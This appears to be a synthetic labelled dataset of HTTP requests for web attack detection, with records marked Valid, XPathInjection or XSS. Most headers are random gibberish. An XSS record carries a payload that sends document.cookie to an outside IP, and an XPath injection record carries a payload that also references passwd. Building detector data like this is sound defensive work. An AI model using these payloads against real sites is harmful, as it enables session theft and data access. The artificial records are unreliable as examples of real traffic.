Proxy-Authorization: aaigsv lkaeTa=nvn1feN
Authorization: Basic RmhzZWluOmVlaG1s
Range: -93658
Referer: /ecsr/ihhEteo.swf
TE: deflate,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.4 (compatible; eplbss; Windows NT; nfht; eaihq)
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0510x855
Via: 2.9 www.r7qowaql.tiff, HTTP/1.0 www.4xxcece.js, 0.4 www.kata.html
Transfer-Encoding: ong6; nrOnomo4=adseo
Upgrade: Lda5tx/2.4, e2i/2.7, aeej/6.6, ers/1.0, sPr0/5.9
Warning: 179 www.bavgex.js "ahhenfcehln" 
X-Forwarded-For: 235.128.16.55
X-Serial-Number: 24972909787990120548
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 13371
Start - Id: 17415
class: Valid
GET /eGqKt2T/iihaooueu9alwiscdt0/wjRRgVE0JJDoFYS/iioifziteneyurwao3/tQzWfUUyLXBkjk9EMP2S/IF0HdivB/lt/FGcHbetweenDprocessing-instructiondM/o8@IJ_DD/ugZL_ihhq7qB/luT.bin? HTTP/1.0
Host: www.eEaae.uk
Connection: keep-alive
Accept: text/*;q=0.7, text/xml, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: i-amo7f;q=0.4, iralea-aoE
Cache-Control: max-age=87
Client-ip: 80.246.163.235
Cookie: to8=63;uDOA-ChGBhq=$E
Cookie2: $Version="0"
Date: Wed, 01 Oct 08 16:44:12 UTC
ETag: W/"-SFr4.3pULWs9tuWYV"
Expect: 100-continue
From: ttdntmte@un8ztuz.it
If-Modified-Since: Sat, 05 Dec 09 15:47:37 GMT
If-Unmodified-Since: Fri, 05 Feb 10 05:33:20 UTC
If-Match: "5VyNE.al8TmWDdLI"
If-None-Match: "cT5fMq@9GF9_0ijgCSy"
If-Range: Fri, 03 Jun 05 03:06:38 UTC
Max-Forwards: 401
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Basic NHB0YWJzaDpocjZ1SmFw
Range: -29
Referer: /sl4s.bin
TE: gzip;q=0.9,deflate,chunked;q=0.2
Trailer: If-Match
User-Agent: tLilcbbrt
UA-CPU: 68000
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 429x433
Via: 8.0 63.77.52.2:98255, 1.5 www.uanr.jpg:66, HTTP/2.4 www.f2do.jpg
Transfer-Encoding: gzip
Upgrade: sAt/7.1
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 233.13.162.49
X-Serial-Number: 8161567353298510
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17415
Start - Id: 29244
class: Valid
GET /tss/eryqWfm-Q.TjI@/l7Clt9utnaeaarf.jpeg?Llrcp@window.openTUhtaccesxp0l=48492918&nbGS-K=9+hes6e%26SliKtr&divwtZRr=gy9N6&ulp=t%3Blac&so5ahNrrdb8Stlw=rnt&aedenOenibewwut=vbscriptR&evRm=73&tmrqaI=aTaOepxOtrr1lE HTTP/1.1
Host: 138.239.84.69
Connection: Qfdwuha
Accept: audio/basic;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 218.202.244.174
Cookie: 3cBeIsdhem=858782;haheeo1mrso=iOH;asoieaa9niphev=iksdTJK_KXT;anull3g=51;ioqd=positionqi~s@A;dspi5anliz6e=m+ro-iotehtn
Cookie2: $Version="55"
Date: Fri, 11 Jun 04 17:20:52 CET
ETag: "cRis3o8LHfYAAhQ1lRxH"
Expect: eO9vsir
From: tnshFaon@heiy5nOc.fr
If-Modified-Since: Tue, 22 Mar 05 15:50:14 CET
If-Unmodified-Since: Fri, 16 Sep 05 15:31:42 UTC
If-Match: "di2@fKGNiQWAMwvOB.V"
If-None-Match: "mIgmtavfP.MECZPz4.BZ"
If-Range: "SOwxbmv6P-N5dQ0oqbRH"
Max-Forwards: 6
MIME-Version: 3.8
Pragma: xernoile=haePa
Proxy-Authorization: Digest qop=deeie
Authorization: Digest nc=8DfF3dea
Range: -03993
Referer: /1iShee/ythaoo0i/3rzrn/ht9dm.conf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.9 (compatible; MSIE 6.5; Unix; ehneo)
UA-CPU: PowerPC
UA-Disp: 772,8743,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: 6.1 241.71.99.61
Transfer-Encoding: nlne; hmgtci1e=SyEfaIwj
Upgrade: hgUnpy/7.4, aroi/7.4
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 184.221.151.22
X-Serial-Number: 4249614312362158832
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29244
Start - Id: 9440
class: Valid
GET /IesegamWs4jcnsk/.telnetqXG1B/oyHCQkcc_1/shutdown81QBkUmjvAKalB/2ded.js?mnstceZraoten=4927122405&wijeoea=166&eFnitekedt=gZB41n4aqmC&6neiiwer=n0g3hd%3Drasctm&KaWWxAA=9 HTTP/1.0
Host: www.zain.fr
Connection: ettycehr
Accept: audio/x-wav
Accept-Charset: euc-jp, iso-8859-8
Accept-Encoding: gzip;q=0.7
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 87.126.243.254
Cookie: eotl1rrSu7=tte]e/eosTc0o;fusgr6eatsceq7a=lPSgnhV;erwuu0ah=vktsrieyedssssir;8eTccFmtmb=6
Cookie2: $Version="00"
Date: Sun, 05 Jul 09 22:57:30 UTC
ETag: W/"@8QA_vWMBay-vYqC"
Expect: etai1l
From: ieue@hoegnHqytl.be
If-Modified-Since: Sun, 18 Jul 04 21:38:01 UTC
If-Unmodified-Since: Sat, 27 Feb 10 07:40:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Oct 05 11:20:34 UTC
Max-Forwards: 04
MIME-Version: 4.1
Pragma: thoIHm='gnathitw'
Proxy-Authorization: uide iwlucnv=bfge1or
Authorization: Digest nonce
Range: 378353-
Referer: http://ttoo.ch/jairiec/euqIsau/ehmu.jpg
TE: trailers,gzip;q=0.7,chunked;q=0.5
Trailer: User-Agent
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 7.4; tT-on; rv:3.5.6) Gecko/41015553
UA-CPU: Sparc
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 383x664
Via: 2.9 www.Rnrho.html
Transfer-Encoding: identity
Upgrade: 2saP/8.1, hoai/5.7, rttsrq/0.0
Warning: 681 www.swfai8dd.jpg:43694 "ecm0herqsI3eelSca8Cl" "Fri, 15 May 09 17:24:55 UTC"
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9440
Start - Id: 28671
class: Valid
GET /xAgpV88uypXv/IiUiframeVoDKTWW/a0eeWeon.js?ctsenigtadxcetb=cKStZ7al5FU&A0=39982&ePfmseotatl=Elrns25e0nrb6&QSBO1Qform=n+&emvsd=+%7Cc&KWB6D=ecrth8caes2ntq&l4XChshnni=ar%2Fstdabh&rioaT=cyy%7C&dacg1yrh2eacej=061 HTTP/1.1
Host: www.slohsimuu.cz
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1253, cp-950;q=0.1, isiri-3342
Accept-Encoding: 
Accept-Language: cstewsj-tdulA, e6tFtw-an;q=0.5, duxoBei-eo;q=0.9, j6nwe-tnan;q=0.0, DN-4ees;q=0.8
Cache-Control: max-stale=17312
Client-ip: 163.137.139.118
Cookie: nszMn=ezeSlv
Cookie2: $Version="662"
Date: Tue, 07 Nov 06 24:56:50 CET
ETag: "GIn6idfzBJze2mc"
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Fri, 13 Aug 04 04:33:57 GMT
If-Unmodified-Since: Thu, 14 Jul 05 10:29:09 CET
If-Match: "FLJXfT2opLaIbPuw1"
If-None-Match: *
If-Range: Tue, 01 Jul 08 13:32:30 GMT
Max-Forwards: 407
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest response="ACCB0ab4D925Dfe60faEfE0DdC85EbC5"
Authorization: Digest username="seenfq"
Range: -533
Referer: http://t4tuaho.ch/aa9ozlz4/e2ia3te/naemr/g6pTfaE2/oErro.exe
TE: chunked;q=0.4,chunked;q=0.2,trailers
Trailer: If-Unmodified-Since
User-Agent: ypBbcWz http://www.rn09irtv.net
UA-CPU: StrongARM
UA-Disp: 670,5224,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9872x6402
Via: 4.8 162.246.129.95:99, FTP/1.5 www.taax.png
Transfer-Encoding: identity
Upgrade: dco/2.9, l3E/4.8, mfm3E/1.3
Warning: 533 72.132.127.220 "beye" "Tue, 19 Sep 06 02:39:53 CET"
X-Forwarded-For: 147.116.71.106
X-Serial-Number: 244229732731
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28671
Start - Id: 6951
class: Valid
POST /qF_QLTy/andO_H./tmpjtTidtmpK8_6/lHK/rertca6ps/sGT85e.sILDle40r/l2p-.BVvGconnect_/s3RoiearhlTeisRcre2o.cfm? HTTP/1.1
Content-Length: 207
Content-Language: ahn7m,Ohs
Content-Encoding: compress
Content-Location: http://www.qncet.cz/ee5oepa/gomThy5/tnolo.mspx
Content-MD5: QXFjZWh0cGVlYXNlOGYxdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 24:33:31 GMT
Last-Modified: Sat, 17 Apr 10 18:53:23 CET
Host: 157.242.153.139:80
Connection: keep-alive
Accept: image/*, video/*, application/x-tar
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: qE-nmOyiidJ;q=0.9, sfiecex3-hnml0dr, rhiaz8-dierltS;q=0.8, r-e, xnhz-elhihi;q=0.9
Cache-Control: max-stale=5193
Client-ip: 149.120.182.235
Cookie: ieThnz=899208744;hpAecneee=esClOqwopenei;ajRvbscriptbgsoundUMconnectOV=Eperlow;Ais=rrcpi)
Cookie2: $Version="3"
Date: Thu, 07 Aug 08 22:55:09 UTC
ETag: W/"Tbvm9zqKkM-v.zrus"
Expect: 100-continue
From: 9tasgo@r6haat.org
If-Modified-Since: Tue, 03 Feb 04 14:05:26 GMT
If-Unmodified-Since: Mon, 04 Feb 08 10:55:33 UTC
If-Match: "tpZHHU3TFY_tidElk_"
If-None-Match: *
If-Range: Fri, 02 Dec 05 20:03:55 CET
Max-Forwards: 22
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: cese6e 2rky=stme
Range: -35,310954-4,-65030
Referer: /8aatyeq9/1l3i/cioet/ididic1c/edjeco.cfm
TE: gzip;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 9.0; dg-w7; rv:9.9.1) Gecko/88969007
UA-CPU: 68000
UA-Disp: 597,002,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4971x673
Via: HTTP/6.6 www.taec5.shtml, anaeks/0.7 www.teelG.html
Transfer-Encoding: gzip
Upgrade: g0aCH/9.9, nmc/8.5, eqhll/6.8
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DVsi39MziHdiv=mv3PZDs3pL9Y&tlnAOsalrxnm=oHdKMrRK&GH_Yr0a7.shutdownTT= 0&ariftexuetf=ia &Qircnil=uelocationestylemnstdinhh&wsemzsruahs=aoaq7&i7thtrtTo=eA&rtctt=e9m62sihrre&ttusa=gaolaemrrfc&Eytuitrtnaaey=hYOq

End - Id: 6951
Start - Id: 27005
class: Valid
GET /ljrQLQW8dbL-8B48imr/12OG/72m.nsf?.Bghtpass.WTuK=hlandioahdc&8H.zW@Otj=4&1.nOXl=RhaFih&TletAce7eu=es7tIeohrt4a&-VhnJQ=ed&haSwaf25ele=laservicesa&frmaadhe=rw&mBhHnne=9092975&yds6i63le=pVz3XWD&eA=81038&xKenMD4Ccapec=t5LNJ&ifrpnedyms0ndma=estyles%3Ba HTTP/1.1
Host: 238.62.173.177:80
Connection: lslwlcod
Accept: text/html;q=0.5, application/zip, application/postscript
Accept-Charset: x-mac-turkish;q=0.9, windows-1252;q=0.3, shift_jis, x-mac-chinesetrad;q=0.3, gb2312
Accept-Encoding: compress
Accept-Language: Ls-A;q=0.8, eh0ca-ahnA;q=0.5
Cache-Control: no-cache
Client-ip: 137.90.213.78
Cookie: childMlaPx=824500512;n4byaaemi3U=tyqz;ice=rgc.hz
Cookie2: $Version="7"
Date: Wed, 03 Nov 04 09:46:09 CET
ETag: "JWpM6Hmn0IlLRUOMc"
Expect: 100-continue
From: eEtd@ots6nnd.gov
If-Modified-Since: Wed, 05 Aug 09 14:10:19 CET
If-Unmodified-Since: Thu, 03 Dec 09 23:07:09 CET
If-Match: "hvC49@3deRgLls9L"
If-None-Match: *
If-Range: Tue, 28 Oct 08 22:50:05 GMT
Max-Forwards: 01
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: Digest nonce
Range: 3-
Referer: http://www.dmlcjpKl.cz/8x0c5c/ammEh/raescos/hsHato.pl
TE: trailers,gzip;q=0.6,trailers
Trailer: Connection
User-Agent: Mozilla/8.8 (compatible; bwhdjon; Open BSD i586; dncdedm3y; oltsea)
UA-CPU: StrongARM
UA-Disp: 254,4962,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6860x985
Via: 1hdsvs/3.2 37.243.237.42, foc/3.1 www.oued.jpg
Transfer-Encoding: deflate
Upgrade: rt4na/4.6
Warning: 505 151.87.160.8 "aeiteFisgt1ec4" "Wed, 18 Jun 08 11:04:17 CET"
X-Forwarded-For: 126.84.101.124
X-Serial-Number: 39801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27005
Start - Id: 49677
class: XPathInjection
GET /Hets/ZdeleteUq7PWuMcB7C/RdiH.asp?ow4ch3n9Site=ut3lje8%27++or+++6+++%3C+++count%28path%2Fchild%3A%3A*%29+++++or++%27aojiyey%27+++%3D+%27&tdaNolaq=e5YNZsWin&swsaio6af=gh6nxU7JheV%40&8mtbjrcgd9wtt=f6%5C%3FDooa&TnOrgheEen=3877&nre=DueacndnWinrssoi&setnR4iW9Tila=position9%27l%3DcE+itt&nTseEahde4n4snt=k0H&allateeeyieiI=ez+0aru%3Fpasswdhihebh2systempassthruinclude%25 HTTP/1.0
Host: 223.151.68.117
Connection: keep-alive
Accept: text/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n9ooordf-etIuis, ryvair-o9h;q=0.2, rntu-zawHign, cettel-w;q=0.9
Cache-Control: no-cache
Client-ip: 102.196.28.62
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="861"
Date: Sat, 05 Apr 08 01:15:09 GMT
ETag: W/"8vg1Wz8V9qRfAnK"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Thu, 17 Jan 08 06:37:38 CET
If-Unmodified-Since: Fri, 23 Apr 10 18:05:17 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7333
MIME-Version: 5.9
Pragma: hd='aapisaa'
Proxy-Authorization: fefd 0ae8ehin=q6gL
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: /0d7hgth.mpg
TE: chunked,chunked
Trailer: Range
User-Agent: yylCe5N/3.9.1.8.5
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: HTTP/5.0 118.178.44.198, yea/3.5 218.106.146.168:03
Transfer-Encoding: identity
Upgrade: uva/6.8
Warning: 381 115.122.86.133 "cnay5hst5e7r" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49677
Start - Id: 1265
class: Valid
GET /aaaVyn2CR-myjjXB/t0/dCd0Mo5e3phn@lRB@2Ie/nKkvW5N11j_BDnGq2RH.jpg?YAX7N=337872513&iocjEOt=qagee20l&2r8see=636595&dRtMb1gmitt4suH=ahDhyfveewf&Qrieit7iHec9uuc=iEhttpsteSdns HTTP/1.0
Host: 244.167.179.68:7343
Connection: keep-alive
Accept: video/*
Accept-Charset: cp-950, iso-8859-15, euc-tw
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: s=ea6nawse
Client-ip: 32.114.105.164
Cookie: acpAeriemqRT=ulee8tmgy( s;yrr(i|;M0vbscriptallMKXC2AR=afjcGBx
Cookie2: $Version="1"
Date: Wed, 16 Apr 08 10:50:44 CET
ETag: W/"FPEdrK1W.XkCkLs"
Expect: 100-continue
From: dSeu@yRMgnu.net
If-Modified-Since: Sat, 14 Jun 08 11:03:53 GMT
If-Unmodified-Since: Wed, 10 Mar 10 17:51:27 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Mar 05 08:29:34 UTC
Max-Forwards: 212
MIME-Version: 8.5
Pragma: ohr=i
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: hnds hdus=iesn
Range: 7-,-0539,-26515
Referer: /soAl/reTrwc/udeed/yaerdtb.tar.gz
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 7.9; oo-AP; rv:3.5.5) Gecko/70447818
UA-CPU: Sparc
UA-Disp: 4986,1989,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7486x696
Via: 1.3 232.57.108.65, FTP/2.7 221.215.112.108
Transfer-Encoding: deflate
Upgrade: oisa/9.7, yntnte/0.1
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 51978605
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1265
Start - Id: 47381
class: XSS
GET /ssssm4nerP9ndEm/nsheitnjoliosdEnlyr/aRz_P45/eblAptemd/et5vocn8vceajbr0u1/o0jGFTdEMLuhzBDyC.cfm?v4ebyaa1r=ndC&dUdioAocsxf5yx0=z4%28&chhfhtsttm5Gote=98&efpmnnacbq4iow=g&Etaibnmh0ont5e=tr51sWuL1&9dxn9de=%3Cimg+src+%3D++%22+++++nama+++%22onmouseover+++%3D+++%22++%5Bwindow.open%28%27http%3A%2F%2F71.113.135.26%2Folla.cfm%27%2Bdocument.cookie%29%3B%5D%22+++%3E&9BbgsoundRFHhTkCq=eEuywdYxzvZZ&aRl=boot.ini7in+%7C&at6ncaoeci=insertalng%2Bo%5Csrs6o7servicesf%3Ceidm&e8yA=v88P8SZgy&otrrdhw=79773046&p8A=v2coasn&Qaa=7643821&egfathdkTlsin=9506 HTTP/1.0
Host: www.Bmnerpbs.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: min-fresh=80
Client-ip: 96.212.118.227
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="55"
Date: Sun, 23 Aug 09 06:36:36 CET
ETag: W/"eK9JG65XxM2Bk-Ko"
Expect: 7xxmj=O1mtSo
From: dhMEe9le@RpqtlrdwLb.be
If-Modified-Since: Sat, 22 May 04 13:12:25 UTC
If-Unmodified-Since: Fri, 23 Jan 09 06:33:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 2.6
Pragma: mdakaru='ieeebrt'
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Basic aXBucmM6ZXNhY3U=
Range: 35419-,75138-2674,165640-
Referer: /h56Mor/hip3r/fated4f.tar
TE: trailers,deflate;q=0.9
Trailer: Expect
User-Agent: Mozilla/8.0 (Windows; U; Win98 6.2; nm-we; rv:1.8.4) Gecko/89014133
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 9.4 134.100.224.172:21, 3.5 www.58oM.css, 8.6 www.emwieaLS.shtml
Transfer-Encoding: gzip
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 630 69.99.208.229 "aypepysetwq" "Mon, 12 Apr 04 06:01:50 CET"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 167101888
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47381
Start - Id: 1861
class: Valid
GET /Sxjhl/RmmeNhagceaozfk7rcru/e5IdczPhiT2mhZ.png?deu=sEJ300%40kcuFu&dpa2=30125006&L.NK6_T4v=nNsh&pdhomipitewsia=iDWu%40oY&asbo=gd&D3processing-instructionZTtF0=306&5ionaeTm=%7Ctl2t&t5arrhp9=ea4tdstyle&mNphp0apphpLb=8576 HTTP/1.0
Host: www.twbasbnlqw.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.5
Cache-Control: i='dwidbE'
Client-ip: 188.102.222.214
Cookie: bbrasw1=1;Q1y2updateJEd7P=lQc0fs@ZcFOI;ena7enc=94630664;ye4=9798;ori=629108
Cookie2: $Version="36"
Date: Sat, 25 Feb 06 15:35:14 GMT
ETag: W/"1vcB05ZQJrPJeyLPkpwL"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Fri, 27 Oct 06 03:07:31 GMT
If-Unmodified-Since: Thu, 01 Jul 04 11:16:38 GMT
If-Match: "DxFsdKCunsNM6HXDY"
If-None-Match: "To2JtdrmX0kd@WpL8gRs"
If-Range: Thu, 23 Jul 09 23:54:43 CET
Max-Forwards: 4
MIME-Version: 9.5
Pragma: flrhs0sa=ao
Proxy-Authorization: NTLM ZWhpaWFlc2VqZVBUb25iZlkyMG5pVGFhVGxoYW85b2FobHNpdTNOdGNyeWFzcmRp
Authorization: NTLM cUh0bWdzaHRkTG5mc2ZEZmV6aXR4b2Vobm9vaG5pYWEyZUM=
Range: -34624,61390-055,75119-
Referer: /bhpt/a9np/or6sleet/wehnri.jpg
TE: trailers
Trailer: Range
User-Agent: Mozilla/0.7 (X11; U; SunOS sun4u 2.6; ew-ea; rv:1.7.5) Gecko/48245229
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 063x9656
Via: FTP/8.3 42.154.138.130, 6.9 www.ce1n7ni.css, OfcnE/1.9 www.fmrsoise.jpg
Transfer-Encoding: identity
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 195 79.247.8.91 "v9omtairreetwatxt" 
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1861
Start - Id: 12697
class: Valid
GET /G9O/e2lGqz9qxH71/4rrknq1.exe?aoedueas4to1=noec&rcpJrcphzt6Ahmi=5eszl8aria&twtmenr4g9rdem=6H-Ynt6Gs&esursmohor63nl4=%27%3B5&ny6drbnsouaenc=3 HTTP/1.1
Host: www.t8uadb.ch
Connection: zh8sos
Accept: */*
Accept-Charset: cp-932, iso-8859-3;q=0.4
Accept-Encoding: 
Accept-Language: o-i
Cache-Control: no-cache
Client-ip: 141.142.203.127
Cookie: jo1Ee1s=blga3kYz4aO;nyThoh=mraoru;thi=ruShc;AyqxuO=4nrlhnmchk;loiepeeDae=eMrmuozasryi;tytnd=513995066
Cookie2: $Version="994"
Date: Mon, 20 Aug 07 10:43:52 CET
ETag: "nqAAltaC5qFMUOnweP-h"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Sun, 08 Nov 09 01:56:34 GMT
If-Unmodified-Since: Wed, 18 Mar 09 02:42:59 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 27 Dec 05 07:24:00 UTC
Max-Forwards: 870
MIME-Version: 5.1
Pragma: c=ra
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: onOl dlt7ot=nrlid
Range: 663086-5
Referer: http://www.ctoeoi.org/hUewryor/ia5hn/koc9sti.asp
TE: deflate,gzip
Trailer: If-Match
User-Agent: fesohlr/1.8.6
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: pad/3.3 61.87.216.217, 9.6 www.eEozirue.png:34018, FTP/7.7 www.sidso.png
Transfer-Encoding: gzip
Upgrade: hlvieb/6.1, ea8O/4.9, dmeXre/8.7, htt5c/9.5
Warning: 415 23.127.109.130 "Htnbmsi8asplanitu" "Tue, 09 Mar 04 16:06:59 GMT"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 91220427481224
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12697
Start - Id: 30726
class: Valid
GET /t-KcK7/i0C1mp7OE.cfm?rxte=tPadaamn&rAom=l0ann&kLrhzhcSco=haolpsleftuO5&Eehndtaeb1i8o8Z=processing-instructionzdxterm&Gsfo6h=76&finsert5gJEV=%24&mvtithtdtoilqls=398&r6ref=88297&sseiwpdpi=imf&idnn3T=hltsEiJbrmrtEip&hcl=g HTTP/1.0
Host: www.actaOar.st:80
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.6, macintosh;q=0.0, windows-1254
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 45.133.46.216
Cookie: eerelpdlbnu6R=hxYv-rt@sN;lm=9387841
Cookie2: $Version="545"
Date: Sat, 02 May 09 20:31:59 CET
ETag: "BcxivruTmgxjLi._A"
Expect: gWsmmbl
From: dubt@tmrdi.net
If-Modified-Since: Thu, 17 Aug 06 22:05:57 CET
If-Unmodified-Since: Mon, 29 Sep 08 14:04:47 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1533
MIME-Version: 7.4
Pragma: linylsgX=es0s
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Digest username="tkaelef"
Range: 1-,-425,74618-
Referer: /1antnd3/eztjmmud.wav
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 8.5; ie-ii; rv:7.0.1) Gecko/97512562
UA-CPU: x86
UA-Disp: 802,001,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2445x5903
Via: Ocpt/9.4 231.191.254.140:7, HTTP/6.1 121.70.132.35:22097, 5.8 www.omha.shtml
Transfer-Encoding: deflate
Upgrade: uom4/0.1, suMtl/8.8
Warning: 309 www.mtrueg.jpeg:8 "enaoExpt2ech" "Sun, 23 Oct 05 23:02:27 CET"
X-Forwarded-For: 31.136.183.183
X-Serial-Number: 248623
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30726
Start - Id: 27851
class: Valid
GET /n714gGdDDWW/9JSBLD3PVdJe/ghDXhtpass/tcRQep/lpFoKw@W5Yi1ZM0Q0KU/la/reiktfaginhE/wparurpdijfbslc7i/0t9selectPv5ND@.swf?gdtE=lsthhee2r&ljoed0ai=rvcoscl%40mtq+8 HTTP/1.1
Host: 208.144.238.156:18770
Connection: close
Accept: text/*
Accept-Charset: euc-cn;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=31622
Client-ip: 62.13.156.171
Cookie: gfciia=mTcsY6;se=i_e;teeupHydeR=:n [et8erewtitididsLe;opeuHsia3k=gah)m-8snli<%us;btak=itionvblytEdl6;Airrobr7lhn=ossum
Cookie2: $Version="1"
Date: Tue, 09 Dec 08 08:16:08 UTC
ETag: "T7R-PajXniYdaIVIMa"
Expect: 100-continue
From: xalea@r7nedo.fr
If-Modified-Since: Wed, 16 Aug 06 23:11:00 GMT
If-Unmodified-Since: Wed, 28 Apr 10 22:16:06 GMT
If-Match: "JopLzwIkSQX3VMyv"
If-None-Match: *
If-Range: Mon, 29 Dec 08 01:59:28 UTC
Max-Forwards: 2
MIME-Version: 7.2
Pragma: hlre=n
Proxy-Authorization: mkd8c naeroilc=pleeis
Authorization: w598 5mgd=rEde
Range: 388-
Referer: http://www.iune2n.com/iaimwlif/ae1ca9ae.nsf
TE: chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.7 (Windows; U; Win98 5.0; re-re; rv:1.0.2) Gecko/61456096
UA-CPU: 68000
UA-Disp: 904,456,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0689x744
